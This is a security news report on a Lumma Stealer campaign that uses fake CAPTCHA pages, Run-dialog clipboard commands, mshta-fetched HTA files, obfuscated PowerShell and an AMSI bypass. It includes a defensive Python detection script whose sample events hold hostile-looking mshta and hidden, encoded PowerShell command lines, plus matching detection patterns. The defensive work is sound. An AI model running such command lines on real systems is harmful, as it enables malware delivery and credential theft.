
Example of the malicious command in the Run window | Source: Netskope
A new malware campaign leveraging the Lumma Stealer malware-as-a-service (MaaS) model has been uncovered by Netskope Threat Labs. This campaign, which began in January 2024, employs social engineering techniques such as fake CAPTCHA pages to deceive victims into downloading and executing malware outside their browsers, bypassing traditional security defenses. According to the report, this campaign spans multiple industries and regions, targeting victims in the U.S., Argentina, Colombia, the Philippines, and more.
The report highlights several advanced techniques and findings:
- Fake CAPTCHA social engineering: The campaign uses CAPTCHA-like interfaces to trick victims into executing malicious commands. Netskope researchers noted, “The fake CAPTCHA is an exceptionally creative piece of social engineering designed to trick the victim into downloading and executing malware outside the browser.”
- Clipboard hijacking: Victims are instructed to copy and execute a command via the Windows Run window (Win+R), bypassing browser-based security controls.
- Evasion via LOLBins: The malware utilizes legitimate Windows tools like mshta.exe to download and execute malicious HTA files, making detection more difficult.

The infection chain starts when victims visit a malicious website displaying a fake CAPTCHA. This CAPTCHA prompts them to open the Windows Run window, paste a preloaded command from their clipboard, and execute it. The malicious command downloads an HTA file, which uses PowerShell to decode and execute obfuscated scripts, ultimately delivering the Lumma Stealer payload.
“Downloading malware payloads outside the browser serves as an anti-analysis mechanism, evading browser-based cybersecurity controls,” the report emphasizes.
To avoid detection, the malware employs sophisticated techniques, including:
- AMSI bypass: By modifying the “clr.dll” module in memory, the malware prevents Windows Antimalware Scan Interface (AMSI) from scanning its final payload.
- Obfuscation layers: The infection process involves multiple layers of obfuscated PowerShell scripts. The final step decodes and executes the Lumma Stealer payload using reflection.
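The chain described above (Run dialog, mshta.exe fetching a remote HTA, PowerShell decoding obfuscated stages) maps directly onto process-creation telemetry. The following is an added detection example, not code from Netskope or the report; it runs over constructed Sysmon-style events (the field names, URL and flags are assumptions) and flags each stage of that chain.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style); not real telemetry.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" https://example.invalid/captcha.hta'},
    {"ParentImage": r"C:\Windows\System32\mshta.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -ep bypass -enc AAAA"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" C:\Program Files\Vendor\setup.hta'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe"},
]

URL_RE = re.compile(r"https?://", re.IGNORECASE)
# Hidden-window and encoded-command switches typical of obfuscated PowerShell loaders.
PS_OBFUSCATION_RE = re.compile(r"-(enc|encodedcommand|w hidden|windowstyle hidden)", re.IGNORECASE)


def basename(path):
    """Last path component, lower-cased, so rules compare image names only."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the list of rule names the event matches (empty means benign)."""
    hits = []
    image, parent, cmd = basename(event["Image"]), basename(event["ParentImage"]), event["CommandLine"]
    # Stage 1: mshta launched from the shell (Win+R runs via explorer.exe) with a remote HTA.
    if image == "mshta.exe" and parent == "explorer.exe" and URL_RE.search(cmd):
        hits.append("mshta_remote_hta_from_run_dialog")
    # Stage 2: PowerShell spawned by mshta, the decode-and-execute step of the chain.
    if parent == "mshta.exe" and image in ("powershell.exe", "pwsh.exe"):
        hits.append("powershell_spawned_by_mshta")
    # Stage 3: hidden or encoded PowerShell, consistent with layered obfuscated scripts.
    if image in ("powershell.exe", "pwsh.exe") and PS_OBFUSCATION_RE.search(cmd):
        hits.append("obfuscated_powershell_flags")
    return hits


def scan(events):
    """Return (index, hits) for every event that matched at least one rule."""
    return [(i, classify(e)) for i, e in enumerate(events) if classify(e)]


if __name__ == "__main__":
    for index, hits in scan(SAMPLE_EVENTS):
        print(index, SAMPLE_EVENTS[index]["CommandLine"], hits)
```

The third sample (mshta opening a local HTA) is deliberately not flagged by these rules; a stricter deployment may choose to alert on any mshta.exe launched from the Run dialog.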
“The AMSI bypass code appears to be a copy of an open source implementation,” the researchers noted, pointing to the increasing reliance of attackers on open-source tools to refine their evasion techniques.
This campaign has affected a wide range of sectors, including healthcare, banking, marketing, and telecommunications, with telecommunications being the most targeted industry. The Lumma Stealer malware, which has been active since at least 2022, is designed to exfiltrate sensitive data such as passwords, cookies, and cryptocurrency wallets.